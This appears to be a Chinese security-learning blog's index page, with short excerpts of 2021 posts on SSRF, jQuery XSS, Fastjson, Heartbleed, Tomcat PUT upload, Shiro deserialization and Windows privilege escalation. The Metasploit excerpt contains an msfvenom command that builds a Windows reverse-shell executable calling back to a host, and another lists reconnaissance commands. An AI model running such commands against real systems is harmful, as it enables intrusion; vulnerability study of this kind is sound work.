摘要: SSRF漏洞 SSRF(Server-Site Request Forery)服务端请求伪造 形成原因 服务端提供了从其他服务器获取数据的功能,但没有对内网目标地址做过滤和限制。 容易出现的地方:将url请求作为参数请求资源时发生,分享、下载图片、从别的服务器请求资源等 主要利用方式 1.对外网、服 阅读全文
posted @ 2021-07-10 15:38 cjz12138 阅读(59) 评论(0) 推荐(0) 编辑
摘要: jquery安全相关 https://cloud.tencent.com/developer/article/1516331 查看jquery版本方法 在网页源码中查看 console打印$.fn.jquery console打印 jquery低版本xss漏洞 漏洞复现工具 https://gith 阅读全文
posted @ 2021-07-10 15:34 cjz12138 阅读(101) 评论(0) 推荐(0) 编辑
摘要: Fastjson1.2.24 RCE漏洞复现 环境搭建 vulhub docker搭建 docker-compose up -d 部署在kali的8090端口 java jdk版本 漏洞利用需要jdk8,而kali自带的jdk是jdk11 先卸载kali的jdk dpkg --list | grep 阅读全文
posted @ 2021-07-10 15:32 cjz12138 阅读(90) 评论(0) 推荐(0) 编辑
摘要: HTTPS加密(SSL) 基本原理 1.客户端向服务端发送https请求,即输入网址后,链接到服务器的443端口 2.在服务端(如果采用https协议的话)就必须要有一套数字证书,这个证书其实就是一对公钥和私钥。 3.客户端请求完后,服务端会向客户端发送一个证书,也就是一个公钥,这里称作公钥A,里面 阅读全文
posted @ 2021-07-10 15:28 cjz12138 阅读(360) 评论(0) 推荐(0) 编辑
摘要: open-SSL心脏滴血漏洞 在客户端和服务端建立了TLS加密连接状态后,需要隔一段时间来发送心跳数据包来确保对端是否在线 具体做法是客户端发送Client Hello 数据包,服务端返回Server Hello数据包 在client hello 数据包中有个字段length询问字符长度,当leng 阅读全文
posted @ 2021-07-10 15:18 cjz12138 阅读(210) 评论(0) 推荐(0) 编辑
摘要: TOMCAT CVE-2017-12165复现 漏洞原理 在tomcat的配置文件web-xml中,有一项参数叫readonly 默认为true ,如果被改成了false 则允许了http的DELETE 和 PUT 方法, 导致可以上传jsp执行任意代码 环境搭建 用docker + vulhub搭 阅读全文
posted @ 2021-07-10 15:08 cjz12138 阅读(65) 评论(0) 推荐(0) 编辑
摘要: Springboot框架actuator配置不当修复方案及验证详细 1.判断是否使用了Springboot框架 方法一: 查看网页图标 如果是类似SpringBoot框架的默认图标 这样的图标则大概率是使用了该框架 方法二:在方法一如果不能完全确定时,可以在网页路径在输入错误路径导致网页报错 查看网 阅读全文
posted @ 2021-07-10 15:06 cjz12138 阅读(2304) 评论(0) 推荐(0) 编辑
摘要: Shiro1.2.4RememberMe反序列化漏洞 针对Shiro版本1.2.4以下有效,Shiro是一个java框架 漏洞原理 Apache Shiro 有记住密码的功能,在登录成功后会生成字段setcookie 而这个cookie值是经过序列化 AES加密 base64编码得到 而在Shiro 阅读全文
posted @ 2021-07-10 15:02 cjz12138 阅读(149) 评论(0) 推荐(0) 编辑
摘要: windows提权 信息收集 收集内容包括:操作系统信息、补丁情况、安装软件的情况、安装防护软件情况、端口开放情况 systeminfo hostname //主机名 set //环境变量 net user //用户 tasklist /svc //查看服务和pid /svc查看进程中的服务 net 阅读全文
posted @ 2021-07-10 14:56 cjz12138 阅读(116) 评论(0) 推荐(0) 编辑
摘要: metasploit 木马生成与监听 msfvenom -p windows/meterpreter/reverse_tcp -lhost=192.168.1.1 lport=4444 -f exe -o /tmp/shell.exe //生成windows下的木马文件 use exploit/mu 阅读全文
posted @ 2021-07-10 14:51 cjz12138 阅读(44) 评论(0) 推荐(0) 编辑